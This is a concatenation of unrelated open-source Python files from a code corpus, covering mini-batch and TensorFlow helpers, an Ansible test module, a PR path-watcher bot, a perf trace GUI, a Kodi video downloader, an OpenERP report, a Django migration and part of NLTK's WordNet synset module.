    mini_batches -- list of synchronous (mini_batch_X, mini_batch_Y)
    """
    m = X.shape[1]                  # number of training examples
    mini_batches = []
    np.random.seed(seed)

    # Step 1: Shuffle (X, Y) with the SAME permutation so that example
    # columns stay paired with their labels.
    permutation = list(np.random.permutation(m))
    shuffled_X = X[:, permutation]
    shuffled_Y = Y[:, permutation].reshape((Y.shape[0], m))

    # Step 2: Partition (shuffled_X, shuffled_Y), minus the end case.
    # Use integer floor division: math.floor() returns a float under
    # Python 2, and range() rejects floats under Python 3.
    num_complete_minibatches = m // mini_batch_size
    for k in range(0, num_complete_minibatches):
        mini_batch_X = shuffled_X[:, k * mini_batch_size : (k + 1) * mini_batch_size]
        mini_batch_Y = shuffled_Y[:, k * mini_batch_size : (k + 1) * mini_batch_size]
        mini_batches.append((mini_batch_X, mini_batch_Y))

    # Handle the end case (a final mini-batch smaller than mini_batch_size).
    if m % mini_batch_size != 0:
        mini_batch_X = shuffled_X[:, num_complete_minibatches * mini_batch_size : m]
        mini_batch_Y = shuffled_Y[:, num_complete_minibatches * mini_batch_size : m]
        mini_batches.append((mini_batch_X, mini_batch_Y))

    return mini_batches
def convert_to_one_hot(Y, C):
    """Return the one-hot encoding of label vector Y.

    Y -- array of integer class labels
    C -- number of classes
    Returns a (C, m) array whose column j is the one-hot vector of Y[j].
    """
    labels = Y.reshape(-1)
    # Row i of the identity is the one-hot vector for class i; transpose
    # so each example becomes a column.
    one_hot_rows = np.eye(C)[labels]
    return one_hot_rows.T
def predict(X, parameters):
    """Run a forward pass of the trained 3-layer net and return the
    predicted class index (argmax over the output logits) for input X.

    Arguments:
    X -- input example, fed into a (12288, 1) placeholder
    parameters -- dict of trained numpy arrays "W1","b1","W2","b2","W3","b3"

    Returns:
    prediction -- result of tf.argmax over the final linear layer.

    NOTE: uses the TF1 graph/session API (tf.placeholder, tf.Session);
    will not run under TF2 eager mode without compat shims.
    """
    W1 = tf.convert_to_tensor(parameters["W1"])
    b1 = tf.convert_to_tensor(parameters["b1"])
    W2 = tf.convert_to_tensor(parameters["W2"])
    b2 = tf.convert_to_tensor(parameters["b2"])
    W3 = tf.convert_to_tensor(parameters["W3"])
    b3 = tf.convert_to_tensor(parameters["b3"])

    params = {"W1": W1,
              "b1": b1,
              "W2": W2,
              "b2": b2,
              "W3": W3,
              "b3": b3}

    # 12288-dim input, one example per column (presumably 64x64x3 images
    # flattened -- confirm against the training pipeline).
    x = tf.placeholder("float", [12288, 1])

    z3 = forward_propagation_for_predict(x, params)
    p = tf.argmax(z3)

    # NOTE(review): the Session is never closed; acceptable for a one-off
    # prediction helper, but leaks resources if called repeatedly.
    sess = tf.Session()
    prediction = sess.run(p, feed_dict = {x: X})

    return prediction
def forward_propagation_for_predict(X, parameters):
    """
    Implements the forward propagation for the model: LINEAR -> RELU -> LINEAR -> RELU -> LINEAR -> SOFTMAX

    Arguments:
    X -- input dataset placeholder, of shape (input size, number of examples)
    parameters -- python dictionary containing your parameters "W1", "b1", "W2", "b2", "W3", "b3"
                  the shapes are given in initialize_parameters

    Returns:
    Z3 -- the output of the last LINEAR unit (softmax is applied by the
          loss / argmax downstream, not here)
    """
    # Retrieve the parameters from the dictionary "parameters"
    W1 = parameters['W1']
    b1 = parameters['b1']
    W2 = parameters['W2']
    b2 = parameters['b2']
    W3 = parameters['W3']
    b3 = parameters['b3']

    # Numpy Equivalents:
    Z1 = tf.add(tf.matmul(W1, X), b1)      # Z1 = np.dot(W1, X) + b1
    A1 = tf.nn.relu(Z1)                    # A1 = relu(Z1)
    Z2 = tf.add(tf.matmul(W2, A1), b2)     # Z2 = np.dot(W2, A1) + b2
    A2 = tf.nn.relu(Z2)                    # A2 = relu(Z2)
    Z3 = tf.add(tf.matmul(W3, A2), b3)     # Z3 = np.dot(W3, A2) + b3

    return Z3
| gpl-3.0 |
roadmapper/ansible | test/integration/targets/want_json_modules_posix/library/helloworld.py | 62 | 1047 | #!/usr/bin/python
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
# WANT_JSON
import json
import sys
try:
    # WANT_JSON module (see marker above): Ansible passes the path of a
    # JSON arguments file as argv[1].
    with open(sys.argv[1], 'r') as f:
        data = json.load(f)
except (IOError, OSError, IndexError):
    # IndexError: no argv[1] given; IOError/OSError: file unreadable.
    # Report failure in Ansible's JSON result format and exit non-zero.
    print(json.dumps(dict(msg="No argument file provided", failed=True)))
    sys.exit(1)

salutation = data.get('salutation', 'Hello')
name = data.get('name', 'World')
# Emit the module result as a single JSON object on stdout.
print(json.dumps(dict(msg='%s, %s!' % (salutation, name))))
| gpl-3.0 |
servo-highfive/highfive | highfive/event_handlers/pull_request/path_watcher_notifier/__init__.py | 2 | 1385 | from ... import EventHandler
import re
class PathWatcherNotifier(EventHandler):
    '''Checks the paths in PR diff and notifies the watchers of those paths (if any).'''

    def on_issue_open(self):
        """Post one comment mentioning every configured watcher whose
        watched path-prefixes match a file changed by this pull request."""
        config = self.get_matched_subconfig()
        if not (config and self.api.is_pull):
            return

        mentions = {}
        for path in self.api.get_changed_files():
            # items()/list comprehensions instead of Py2-only iteritems()
            # and filter()/map(): under Py3 those would be one-shot
            # iterators, so the exclusion list would be exhausted after
            # the first any() and later matches would never be excluded.
            for user, watched in config.items():
                if user == self.api.creator:    # don't mention the creator
                    continue

                # Patterns prefixed with '-' are exclusions; the rest are
                # watched path prefixes.
                not_watched = [p.lstrip('-') for p in watched if p.startswith('-')]
                watched_paths = [p for p in watched if not p.startswith('-')]

                for watched_path in watched_paths:
                    if path.startswith(watched_path):
                        if any(path.startswith(p) for p in not_watched):
                            continue
                        mentions.setdefault(user, []).append(path)

        if not mentions:
            return

        message = [self.config['message_header']]
        for watcher, files in mentions.items():
            message.append(" * @{}: {}".format(watcher, ', '.join(files)))
        self.api.post_comment('\n'.join(message))


handler = PathWatcherNotifier
| mpl-2.0 |
miiicmueller/android_kernel_raspberryPi_rpiv2 | tools/perf/scripts/python/Perf-Trace-Util/lib/Perf/Trace/SchedGui.py | 12980 | 5411 | # SchedGui.py - Python extension for perf script, basic GUI code for
# traces drawing and overview.
#
# Copyright (C) 2010 by Frederic Weisbecker <fweisbec@gmail.com>
#
# This software is distributed under the terms of the GNU General
# Public License ("GPL") version 2 as published by the Free Software
# Foundation.
try:
import wx
except ImportError:
raise ImportError, "You need to install the wxpython lib for this script"
class RootFrame(wx.Frame):
    """Top-level window that draws scheduler trace data as rows of
    rectangles inside a scrollable, zoomable wx drawing area.

    All drawing is delegated back to *sched_tracer* (which calls
    paint_rectangle_zone()); this class only manages geometry, scrolling,
    zooming and input events.  This is a Python 2 file (see the py2
    'raise ImportError,' guard above), so '/' on ints floor-divides.
    """

    Y_OFFSET = 100           # top margin before the first rectangle row
    RECT_HEIGHT = 100        # height of one rectangle row
    RECT_SPACE = 50          # vertical gap between rows
    EVENT_MARKING_WIDTH = 5  # height of the event-marker strip atop a rect

    def __init__(self, sched_tracer, title, parent = None, id = -1):
        wx.Frame.__init__(self, parent, id, title)

        (self.screen_width, self.screen_height) = wx.GetDisplaySize()
        self.screen_width -= 10
        self.screen_height -= 10
        self.zoom = 0.5            # horizontal scale factor (see us_to_px)
        self.scroll_scale = 20     # pixels per scroll unit
        self.sched_tracer = sched_tracer
        self.sched_tracer.set_root_win(self)
        (self.ts_start, self.ts_end) = sched_tracer.interval()
        self.update_width_virtual()
        self.nr_rects = sched_tracer.nr_rectangles() + 1
        self.height_virtual = RootFrame.Y_OFFSET + (self.nr_rects * (RootFrame.RECT_HEIGHT + RootFrame.RECT_SPACE))

        # whole window panel
        self.panel = wx.Panel(self, size=(self.screen_width, self.screen_height))

        # scrollable container
        self.scroll = wx.ScrolledWindow(self.panel)
        self.scroll.SetScrollbars(self.scroll_scale, self.scroll_scale, self.width_virtual / self.scroll_scale, self.height_virtual / self.scroll_scale)
        self.scroll.EnableScrolling(True, True)
        self.scroll.SetFocus()

        # scrollable drawing area
        self.scroll_panel = wx.Panel(self.scroll, size=(self.screen_width - 15, self.screen_height / 2))
        self.scroll_panel.Bind(wx.EVT_PAINT, self.on_paint)
        self.scroll_panel.Bind(wx.EVT_KEY_DOWN, self.on_key_press)
        self.scroll_panel.Bind(wx.EVT_LEFT_DOWN, self.on_mouse_down)

        # Events are bound on both the panel and the scroll window so the
        # handlers fire regardless of which widget currently has focus.
        self.scroll.Bind(wx.EVT_PAINT, self.on_paint)
        self.scroll.Bind(wx.EVT_KEY_DOWN, self.on_key_press)
        self.scroll.Bind(wx.EVT_LEFT_DOWN, self.on_mouse_down)

        self.scroll.Fit()
        self.Fit()

        self.scroll_panel.SetDimensions(-1, -1, self.width_virtual, self.height_virtual, wx.SIZE_USE_EXISTING)

        self.txt = None   # summary StaticText, created lazily by update_summary()

        self.Show(True)

    def us_to_px(self, val):
        """Convert a time delta to pixels at the current zoom (divides by
        10**3; the exact input unit depends on the tracer -- TODO confirm)."""
        return val / (10 ** 3) * self.zoom

    def px_to_us(self, val):
        """Inverse of us_to_px()."""
        return (val / self.zoom) * (10 ** 3)

    def scroll_start(self):
        """Return the scroll origin in pixels (scroll units * scale)."""
        (x, y) = self.scroll.GetViewStart()
        return (x * self.scroll_scale, y * self.scroll_scale)

    def scroll_start_us(self):
        """Return the horizontal scroll origin converted to time units."""
        (x, y) = self.scroll_start()
        return self.px_to_us(x)

    def paint_rectangle_zone(self, nr, color, top_color, start, end):
        """Draw one rectangle in row *nr* for the [start, end] interval.

        If top_color is given, a thin EVENT_MARKING_WIDTH strip is drawn
        along the rectangle's top edge first.
        NOTE(review): width_px is computed from 'end - ts_start' rather
        than 'end - start' -- looks suspicious; confirm intent.
        """
        offset_px = self.us_to_px(start - self.ts_start)
        width_px = self.us_to_px(end - self.ts_start)

        offset_py = RootFrame.Y_OFFSET + (nr * (RootFrame.RECT_HEIGHT + RootFrame.RECT_SPACE))
        width_py = RootFrame.RECT_HEIGHT

        dc = self.dc

        if top_color is not None:
            (r, g, b) = top_color
            top_color = wx.Colour(r, g, b)
            brush = wx.Brush(top_color, wx.SOLID)
            dc.SetBrush(brush)
            dc.DrawRectangle(offset_px, offset_py, width_px, RootFrame.EVENT_MARKING_WIDTH)
            # Shrink the main rectangle so it sits below the marker strip.
            width_py -= RootFrame.EVENT_MARKING_WIDTH
            offset_py += RootFrame.EVENT_MARKING_WIDTH

        (r ,g, b) = color
        color = wx.Colour(r, g, b)
        brush = wx.Brush(color, wx.SOLID)
        dc.SetBrush(brush)
        dc.DrawRectangle(offset_px, offset_py, width_px, width_py)

    def update_rectangles(self, dc, start, end):
        """Ask the tracer to (re)draw the [start, end] zone (absolute ts)."""
        start += self.ts_start
        end += self.ts_start
        self.sched_tracer.fill_zone(start, end)

    def on_paint(self, event):
        """Repaint only the currently visible horizontal window."""
        dc = wx.PaintDC(self.scroll_panel)
        self.dc = dc

        width = min(self.width_virtual, self.screen_width)
        (x, y) = self.scroll_start()
        start = self.px_to_us(x)
        end = self.px_to_us(x + width)
        self.update_rectangles(dc, start, end)

    def rect_from_ypixel(self, y):
        """Map a y pixel coordinate to its rectangle row index, or -1 if
        it falls outside every row (e.g. in the inter-row spacing)."""
        y -= RootFrame.Y_OFFSET
        rect = y / (RootFrame.RECT_HEIGHT + RootFrame.RECT_SPACE)
        height = y % (RootFrame.RECT_HEIGHT + RootFrame.RECT_SPACE)

        if rect < 0 or rect > self.nr_rects - 1 or height > RootFrame.RECT_HEIGHT:
            return -1

        return rect

    def update_summary(self, txt):
        """Replace the summary text shown below the trace area."""
        if self.txt:
            self.txt.Destroy()
        self.txt = wx.StaticText(self.panel, -1, txt, (0, (self.screen_height / 2) + 50))

    def on_mouse_down(self, event):
        """Forward a click to the tracer as (row index, timestamp)."""
        (x, y) = event.GetPositionTuple()
        rect = self.rect_from_ypixel(y)
        if rect == -1:
            return

        t = self.px_to_us(x) + self.ts_start

        self.sched_tracer.mouse_down(rect, t)

    def update_width_virtual(self):
        # Total drawable width for the whole trace at the current zoom.
        self.width_virtual = self.us_to_px(self.ts_end - self.ts_start)

    def __zoom(self, x):
        # Rebuild the scrollbars for the new virtual width, re-anchoring
        # so that timestamp *x* stays at the left edge of the view.
        self.update_width_virtual()
        (xpos, ypos) = self.scroll.GetViewStart()
        xpos = self.us_to_px(x) / self.scroll_scale
        self.scroll.SetScrollbars(self.scroll_scale, self.scroll_scale, self.width_virtual / self.scroll_scale, self.height_virtual / self.scroll_scale, xpos, ypos)
        self.Refresh()

    def zoom_in(self):
        x = self.scroll_start_us()
        self.zoom *= 2
        self.__zoom(x)

    def zoom_out(self):
        x = self.scroll_start_us()
        self.zoom /= 2
        self.__zoom(x)

    def on_key_press(self, event):
        """Keyboard handling: '+'/'-' zoom; arrow keys scroll one unit."""
        key = event.GetRawKeyCode()
        if key == ord("+"):
            self.zoom_in()
            return
        if key == ord("-"):
            self.zoom_out()
            return

        key = event.GetKeyCode()
        (x, y) = self.scroll.GetViewStart()
        if key == wx.WXK_RIGHT:
            self.scroll.Scroll(x + 1, y)
        elif key == wx.WXK_LEFT:
            self.scroll.Scroll(x - 1, y)
        elif key == wx.WXK_DOWN:
            self.scroll.Scroll(x, y + 1)
        elif key == wx.WXK_UP:
            self.scroll.Scroll(x, y - 1)
| gpl-2.0 |
koditraquinas/koditraquinas.repository | plugin.video.traquinas/resources/lib/libraries/simpledownloader.py | 22 | 7995 | '''
Simple XBMC Download Script
Copyright (C) 2013 Sean Poyser (seanpoyser@gmail.com)
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
'''
import re
import json
import urllib
import urllib2
import urlparse
import xbmc
import xbmcgui
import xbmcplugin
import xbmcvfs
import os
import inspect
def download(name, image, url):
    """Queue a download of *url* titled *name* by relaunching this script
    through XBMC's RunScript builtin (which calls doDownload()).

    The destination directory is chosen from the addon settings: TV
    episodes (names ending in 'SxxEyy') go under tv_downloads in a
    show/season tree, everything else under movie_downloads.
    Python 2 code (str.translate two-arg form, urllib.quote_plus).
    """
    from resources.lib.libraries import control

    if url == None:
        return control.infoDialog(control.lang(30501).encode('utf-8'))

    # The url may carry urlencoded request headers after a trailing '|'.
    try: headers = dict(urlparse.parse_qsl(url.rsplit('|', 1)[1]))
    except: headers = dict('')

    url = url.split('|')[0]

    # 'Title S01E02' -> [('Title', '01')]; empty list for movie names.
    content = re.compile('(.+?)\sS(\d*)E\d*$').findall(name)

    # Strip characters that are illegal in file names.
    transname = name.translate(None, '\/:*?"<>|').strip('.')

    # Ancestor paths used below to make sure the whole tree exists.
    levels =['../../../..', '../../..', '../..', '..']

    if len(content) == 0:
        # Movie: <movie_downloads>/<name>/
        dest = control.setting('movie_downloads')
        dest = control.transPath(dest)
        for level in levels:
            try: control.makeFile(os.path.abspath(os.path.join(dest, level)))
            except: pass
        control.makeFile(dest)
        dest = os.path.join(dest, transname)
        control.makeFile(dest)
    else:
        # Episode: <tv_downloads>/<show>/Season <n>/
        dest = control.setting('tv_downloads')
        dest = control.transPath(dest)
        for level in levels:
            try: control.makeFile(os.path.abspath(os.path.join(dest, level)))
            except: pass
        control.makeFile(dest)
        transtvshowtitle = content[0][0].translate(None, '\/:*?"<>|').strip('.')
        dest = os.path.join(dest, transtvshowtitle)
        control.makeFile(dest)
        dest = os.path.join(dest, 'Season %01d' % int(content[0][1]))
        control.makeFile(dest)

    # Keep the source extension only when it is a known video container.
    ext = os.path.splitext(urlparse.urlparse(url).path)[1][1:]
    if not ext in ['mp4', 'mkv', 'flv', 'avi', 'mpg']: ext = 'mp4'
    dest = os.path.join(dest, transname + '.' + ext)

    # Everything is urlencoded so it survives the RunScript argv round-trip.
    sysheaders = urllib.quote_plus(json.dumps(headers))
    sysurl = urllib.quote_plus(url)
    systitle = urllib.quote_plus(name)
    sysimage = urllib.quote_plus(image)
    sysdest = urllib.quote_plus(dest)

    script = inspect.getfile(inspect.currentframe())
    cmd = 'RunScript(%s, %s, %s, %s, %s, %s)' % (script, sysurl, sysdest, systitle, sysimage, sysheaders)

    xbmc.executebuiltin(cmd)
def getResponse(url, headers, size):
    """Open *url* and return the urllib2 response, or None on failure.

    size > 0 requests a 'Range: bytes=<size>-' so an interrupted download
    can be resumed from that offset.  NOTE: mutates the caller's
    *headers* dict when a range is requested.
    """
    try:
        if size > 0:
            size = int(size)
            headers['Range'] = 'bytes=%d-' % size

        req = urllib2.Request(url, headers=headers)

        resp = urllib2.urlopen(req, timeout=30)
        return resp
    except Exception:
        # Narrowed from a bare 'except:' so KeyboardInterrupt/SystemExit
        # are no longer swallowed; any request failure still yields None
        # (callers treat None as "retry / give up").
        return None
def done(title, dest, downloaded):
    """Record a download result and show a summary dialog.

    Results accumulate (separated by '[CR]') in the home-window property
    'GEN-DOWNLOADED'.  The dialog is shown immediately when the download
    failed or nothing is playing; otherwise the text is left in the
    property for a later call to display.
    """
    playing = xbmc.Player().isPlaying()

    text = xbmcgui.Window(10000).getProperty('GEN-DOWNLOADED')

    if len(text) > 0:
        text += '[CR]'

    # Append '<filename> : <colored status>' for this download.
    if downloaded:
        text += '%s : %s' % (dest.rsplit(os.sep)[-1], '[COLOR forestgreen]Download succeeded[/COLOR]')
    else:
        text += '%s : %s' % (dest.rsplit(os.sep)[-1], '[COLOR red]Download failed[/COLOR]')

    xbmcgui.Window(10000).setProperty('GEN-DOWNLOADED', text)

    if (not downloaded) or (not playing):
        xbmcgui.Dialog().ok(title, text)
        xbmcgui.Window(10000).clearProperty('GEN-DOWNLOADED')
def doDownload(url, dest, title, image, headers):
    """Worker entry point (invoked via RunScript from download()).

    Downloads *url* to *dest* in 1 MB chunks with on-screen progress
    notifications every 10%, buffering up to ~5 chunks before flushing,
    and retrying/resuming (via HTTP Range requests when the server
    supports them) on errors.  All arguments arrive urlencoded.
    Python 2 code (print statements, 'except Exception, e').
    """
    headers = json.loads(urllib.unquote_plus(headers))

    url = urllib.unquote_plus(url)
    title = urllib.unquote_plus(title)
    image = urllib.unquote_plus(image)
    dest = urllib.unquote_plus(dest)

    file = dest.rsplit(os.sep, 1)[-1]

    resp = getResponse(url, headers, 0)

    if not resp:
        xbmcgui.Dialog().ok(title, dest, 'Download failed', 'No response from server')
        return

    try: content = int(resp.headers['Content-Length'])
    except: content = 0

    try: resumable = 'bytes' in resp.headers['Accept-Ranges'].lower()
    except: resumable = False

    #print "Download Header"
    #print resp.headers
    if resumable:
        print "Download is resumable"

    if content < 1:
        xbmcgui.Dialog().ok(title, file, 'Unknown filesize', 'Unable to download')
        return

    size = 1024 * 1024       # read in 1 MB chunks
    mb = content / (1024 * 1024)

    if content < size:
        size = content

    total = 0     # bytes flushed to disk so far
    notify = 0    # next progress percentage at which to notify
    errors = 0    # consecutive errors since the last successful read
    count = 0     # total errors seen (for logging only)
    resume = 0    # number of resume attempts so far
    sleep = 0     # seconds to wait before the next retry

    # Dialog().yesno returns 1 on the second button ('Cancel') here.
    if xbmcgui.Dialog().yesno(title + ' - Confirm Download', file, 'Complete file is %dMB' % mb, 'Continue with download?', 'Confirm', 'Cancel') == 1:
        return

    print 'Download File Size : %dMB %s ' % (mb, dest)

    #f = open(dest, mode='wb')
    f = xbmcvfs.File(dest, 'w')

    chunk  = None
    chunks = []   # in-memory buffer of not-yet-flushed chunks

    while True:
        # Progress = bytes already written plus bytes still buffered.
        downloaded = total
        for c in chunks:
            downloaded += len(c)
        percent = min(100 * downloaded / content, 100)
        if percent >= notify:
            xbmc.executebuiltin( "XBMC.Notification(%s,%s,%i,%s)" % ( title + ' - Download Progress - ' + str(percent)+'%', dest, 10000, image))

            print 'Download percent : %s %s %dMB downloaded : %sMB File Size : %sMB' % (str(percent)+'%', dest, mb, downloaded / 1000000, content / 1000000)

            notify += 10

        chunk = None
        error = False

        try:
            chunk = resp.read(size)
            if not chunk:
                # EOF: count it a success only if we are essentially done.
                if percent < 99:
                    error = True
                else:
                    # Flush the remaining buffered chunks and finish.
                    while len(chunks) > 0:
                        c = chunks.pop(0)
                        f.write(c)
                        del c

                    f.close()
                    print '%s download complete' % (dest)
                    return done(title, dest, True)

        except Exception, e:
            print str(e)
            error = True
            sleep = 10
            errno = 0

            if hasattr(e, 'errno'):
                errno = e.errno

            # Winsock error codes below -- this path targets Windows/Kodi.
            if errno == 10035: # 'A non-blocking socket operation could not be completed immediately'
                pass

            if errno == 10054: #'An existing connection was forcibly closed by the remote host'
                errors = 10 #force resume
                sleep = 30

            if errno == 11001: # 'getaddrinfo failed'
                errors = 10 #force resume
                sleep = 30

        if chunk:
            errors = 0
            chunks.append(chunk)
            # Keep at most ~5 chunks buffered; flush the oldest beyond that.
            if len(chunks) > 5:
                c = chunks.pop(0)
                f.write(c)
                total += len(c)
                del c

        if error:
            errors += 1
            count += 1
            print '%d Error(s) whilst downloading %s' % (count, dest)
            xbmc.sleep(sleep*1000)

        # Resume on the first error when the server supports ranges,
        # otherwise only after 10 consecutive errors.
        if (resumable and errors > 0) or errors >= 10:
            if (not resumable and resume >= 50) or resume >= 500:
                #Give up!
                print '%s download canceled - too many error whilst downloading' % (dest)
                return done(title, dest, False)

            resume += 1
            errors = 0
            if resumable:
                chunks = []
                #create new response
                print 'Download resumed (%d) %s' % (resume, dest)
                resp = getResponse(url, headers, total)
            else:
                #use existing response
                pass
if __name__ == '__main__':
    # BUGFIX: 'sys' is not imported at module level in this file, so the
    # argv access below raised NameError when run via RunScript.  Import
    # it locally so the module-level API is unchanged.
    import sys
    if 'simpledownloader.py' in sys.argv[0]:
        # argv: url, dest, title, image, headers (all urlencoded).
        doDownload(sys.argv[1], sys.argv[2], sys.argv[3], sys.argv[4], sys.argv[5])
| gpl-2.0 |
alanjw/GreenOpenERP-Win-X86 | openerp/addons/sale_crm/report/sales_crm_account_invoice_report.py | 103 | 1614 | # -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2010 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
from openerp.osv import fields,osv
class account_invoice_report(osv.osv):
    """Extend the invoice analysis report with the invoice's sales team.

    Appends 'section_id' to the SELECT / sub-SELECT / GROUP BY fragments
    built by the parent report model.
    """
    _inherit = 'account.invoice.report'
    _columns = {
        'section_id': fields.many2one('crm.case.section', 'Sales Team'),
    }

    def _select(self):
        base = super(account_invoice_report, self)._select()
        return "%s, sub.section_id as section_id" % base

    def _sub_select(self):
        base = super(account_invoice_report, self)._sub_select()
        return "%s, ai.section_id as section_id" % base

    def _group_by(self):
        base = super(account_invoice_report, self)._group_by()
        return "%s, ai.section_id" % base
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
| agpl-3.0 |
hacklab-fi/hhlevents | hhlevents/apps/hhlregistrations/migrations/0003_auto_20150411_1919.py | 3 | 1300 | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
    """Auto-generated schema migration: adds Event.close_registrations
    and Person.banned; alters Person.email (unique), and the
    Registration.cancelled / Registration.state fields."""

    dependencies = [
        ('hhlregistrations', '0002_auto_20150411_1912'),
    ]

    operations = [
        migrations.AddField(
            model_name='event',
            name='close_registrations',
            field=models.DateTimeField(null=True, blank=True),
        ),
        migrations.AddField(
            model_name='person',
            name='banned',
            # NOTE(review): verbose_name 'Automatically put to waiting
            # list' looks copied from another field -- confirm intent.
            field=models.DateTimeField(null=True, verbose_name='Automatically put to waiting list', blank=True),
        ),
        migrations.AlterField(
            model_name='person',
            name='email',
            field=models.EmailField(unique=True, max_length=254),
        ),
        migrations.AlterField(
            model_name='registration',
            name='cancelled',
            field=models.DateTimeField(null=True, blank=True),
        ),
        migrations.AlterField(
            model_name='registration',
            name='state',
            field=models.CharField(max_length=2, choices=[(b'AC', b'Assumed coming'), (b'CC', b'Confirmed coming'), (b'WL', b'Waiting-list'), (b'CA', b'Cancelled'), (b'WB', b'Waiting-list (due to ban)')]),
        ),
    ]
| bsd-3-clause |
DrDub/icsisumm | icsisumm-primary-sys34_v1/nltk/nltk-0.9.2/nltk/wordnet/synset.py | 9 | 25090 | # Natural Language Toolkit: Wordnet Interface: Wordnet Module
#
# Copyright (C) 2001-2008 University of Pennsylvania
# Author: Oliver Steele <steele@osteele.com>
# David Ormiston Smith <daosmith@csse.unimelb.edu.au>>
# Steven Bird <sb@csse.unimelb.edu.au>
# URL: <http://nltk.sf.net>
# For license information, see LICENSE.TXT
import math, pickle, string, re
from util import *
from similarity import *
from dictionary import *
from lexname import Lexname
from nltk import defaultdict
class Word(object):
    """A WordNet word: one orthographic form plus its part of speech.

    Synsets are not loaded at construction time; only their file offsets
    are parsed, and synsets() resolves and caches them on first access.
    Python 2 code (map() returns a list here).
    """

    def __init__(self, line):
        """
        Extract a word from a line of a WordNet POS file.

        @type line: C{string}
        @param line: The appropriate line taken from the Wordnet data files.
        """
        tokens = line.split()
        # tokens[3] is the (hex-free, decimal) pointer count; the integer
        # fields of interest start 4 tokens after it.
        ints = map(int, tokens[int(tokens[3]) + 4:])
        self.form = tokens[0].replace('_', ' ')   # orthography
        self.pos = normalizePOS(tokens[1])        # NOUN, VERB, ADJECTIVE, ADVERB
        self.taggedSenseCount = ints[1]           # Number of senses tagged
        self._synsetOffsets = ints[2:ints[0]+2]   # Offsets of this word's synsets

    def synsets(self):
        """
        Get a sequence of the L{synsets}s of this word.

        >>> from nltk.wordnet import *
        >>> N['dog'].synsets()
        [{noun: dog, domestic dog, Canis familiaris}, {noun: frump, dog}, {noun: dog}, {noun: cad, bounder, blackguard, dog, hound, heel}, {noun: frank, frankfurter, hotdog, hot dog, dog, wiener, wienerwurst, weenie}, {noun: pawl, detent, click, dog}, {noun: andiron, firedog, dog, dog-iron}]

        @return: A list of this L{Word}'s L{Synsets}s
        """
        try:
            return self._synsets
        except AttributeError:
            # First access: resolve the stored offsets into Synset
            # objects, cache the list, and drop the raw offsets.
            self._synsets = [getSynset(self.pos, offset)
                             for offset in self._synsetOffsets]
            del self._synsetOffsets
            return self._synsets

    def isTagged(self):
        """
        >>> from nltk.wordnet import *
        >>> N['dog'].isTagged()
        True

        @return: True/false (1/0) if one of this L{Word}'s senses is tagged.
        """
        return self.taggedSenseCount > 0

    # Broken
    # def getAdjectivePositions(self):
    # """
    # >>> from nltk.wordnet import *
    # >>> ADJ['clear'].getAdjectivePositions()
    # [None, 'predicative']
    #
    # @return: Return a list of adjective positions that this word can
    # appear in. These are elements of ADJECTIVE_POSITIONS.
    # """
    #
    # return list(set(synset.position for synset in self))

    # Sequence protocol: a Word behaves as the list of its synsets.
    def __getitem__(self, idx):
        return self.synsets()[idx]

    def __iter__(self):
        return iter(self.synsets())

    def __contains__(self, item):
        return item in self.synsets()

    def __getslice__(self, i, j):
        # Py2-only slicing hook (ignored by Python 3).
        return self.synsets()[i:j]

    def __len__(self):
        return len(self.synsets())

    def __repr__(self):
        # return "<Word:" + self.form + '/' + self.pos + ">"
        return self.__str__()

    def __str__(self):
        return self.form + ' (' + self.pos + ")"
class Synset(object):
"""
A set of synonyms.
Each synset contains one or more Senses, which represent a
specific sense of a specific word. Senses can be retrieved via
synset.getSenses() or through the index notations synset[0],
synset[string], or synset[word]. Synsets also originate zero or
more typed pointers, which can be accessed via
synset.getPointers() or synset.getPointers(pointerType). The
targets of a synset pointer can be retrieved via
synset.getPointerTargets() or
synset.getPointerTargets(pointerType), which are equivalent to
map(Pointer.getTarget(), synset.getPointerTargets(...)).
>>> from nltk.wordnet import *
>>> V['think'][0].synset.verbFrames
(5, 9)
@type pos: C{string}
@param pos: The part of speech -- one of NOUN, VERB, ADJECTIVE, ADVERB.
@type offset: C{int}
@param offset: An integer offset into the part-of-speech file. Together
with pos, this can be used as a unique id.
@type gloss: C{string}
@param gloss: A gloss (dictionary definition) for the sense.
@type verbFrames: C{list} of C{integer}
@param verbFrames: A sequence of integers that index into
VERB_FRAME_STRINGS. These list the verb frames that any
Sense in this synset participates in. (See also
Sense.verbFrames.) Defined only for verbs.
"""
def __init__(self, pos, offset, line):
"""Initialize the Synset from a line in a WordNet synset file."""
# Part of speech -- one of NOUN, VERB, ADJECTIVE, ADVERB.
self.pos = pos
# Integer offset into the part-of-speech file. Together with pos,
# this can be used as a unique id.
self.offset = offset
# The synset entry can be broadly divided into two parts: the
# synset and relational data, and its human readable description, or
# gloss. The '|' character separates these.
dividerIndex = line.index('|')
tokens = line[:dividerIndex].split()
self.ssType = tokens[2]
self.gloss = line[dividerIndex + 1:].strip()
self.lexname = Lexname.lexnames[int(tokens[1])]
# TODO: This next code is dense and confusing. Clean up at some point.
# line is of the form:
